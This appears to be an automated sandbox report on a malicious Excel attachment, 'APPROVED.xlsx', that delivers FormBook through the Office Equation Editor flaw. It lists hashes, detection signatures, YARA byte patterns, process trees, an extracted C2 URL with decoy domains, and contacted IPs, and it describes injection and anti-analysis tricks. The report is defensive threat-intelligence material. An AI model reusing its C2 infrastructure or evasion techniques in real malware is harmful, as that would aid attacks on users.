Play interactive tour

Edit tour

Analysis Report APPROVED.xlsx

Overview

General Information

Sample Name:	APPROVED.xlsx
Analysis ID:	413096
MD5:	09d492cf4937df0290af0be36ba30421
SHA1:	4ad8665febc2f0524d0b23c8f94d947e1a563e14
SHA256:	c0697b83e4d63f9a380466b91ba7db94e823b7a2fd137811bfcce5796a9b82f6
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Execution from Suspicious Folder

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2136 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2412 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 3064 cmdline: 'C:\Users\Public\vbc.exe' MD5: 92BD99870C4E2829F3E6D1B3B512067D)

vbc.exe (PID: 2468 cmdline: C:\Users\Public\vbc.exe MD5: 92BD99870C4E2829F3E6D1B3B512067D)

vbc.exe (PID: 2876 cmdline: C:\Users\Public\vbc.exe MD5: 92BD99870C4E2829F3E6D1B3B512067D)

vbc.exe (PID: 2228 cmdline: C:\Users\Public\vbc.exe MD5: 92BD99870C4E2829F3E6D1B3B512067D)

vbc.exe (PID: 2236 cmdline: C:\Users\Public\vbc.exe MD5: 92BD99870C4E2829F3E6D1B3B512067D)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

autofmt.exe (PID: 2520 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: A475B7BB0CCCFD848AA26075E81D7888)

explorer.exe (PID: 1900 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

cmd.exe (PID: 2028 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9b240:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b5ca:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x21da08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x21dd92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa72dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x229aa5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xa6dc9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x229591:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xa73df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x229ba7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xa7557:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x229d1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9bfe2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x21e7aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xa6044:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x22880c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9cd5a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21f522:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0xac3cf:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22eb97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xad472:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xa9301:$sqlite3step: 68 34 1C 7B E1 0xa9414:$sqlite3step: 68 34 1C 7B E1 0x22bac9:$sqlite3step: 68 34 1C 7B E1 0x22bbdc:$sqlite3step: 68 34 1C 7B E1 0xa9330:$sqlite3text: 68 38 2A 90 C5 0xa9455:$sqlite3text: 68 38 2A 90 C5 0x22baf8:$sqlite3text: 68 38 2A 90 C5 0x22bc1d:$sqlite3text: 68 38 2A 90 C5 0xa9343:$sqlite3blob: 68 53 D8 7F 8C 0xa946b:$sqlite3blob: 68 53 D8 7F 8C 0x22bb0b:$sqlite3blob: 68 53 D8 7F 8C 0x22bc33:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: vbc.exe PID: 3064	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.vbc.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.2.vbc.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.2.vbc.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
8.2.vbc.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.2.vbc.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.2.vbc.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 3.36.53.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2412, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xele[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 3064

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Multi AV Scanner detection for submitted file

Show sources

Source: APPROVED.xlsx

ReversingLabs: Detection: 21%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

Source: 8.2.vbc.exe.400000.1.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdb source: vbc.exe, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, explorer.exe
Source:	Binary string: explorer.pdb source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdbh source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_004F42C8
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_004F42B8
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop edi	8_2_00416282
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx	8_2_00406A94
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop edi	11_2_00096282
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop ebx	11_2_00086A95

Source: global traffic

DNS query: name: www.hfjxhs.com

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 3.36.53.50:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 3.36.53.50:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 75.2.66.247:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.adultpeace.com/p2io/

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.zmzcrossrt.xyz

Source: global traffic

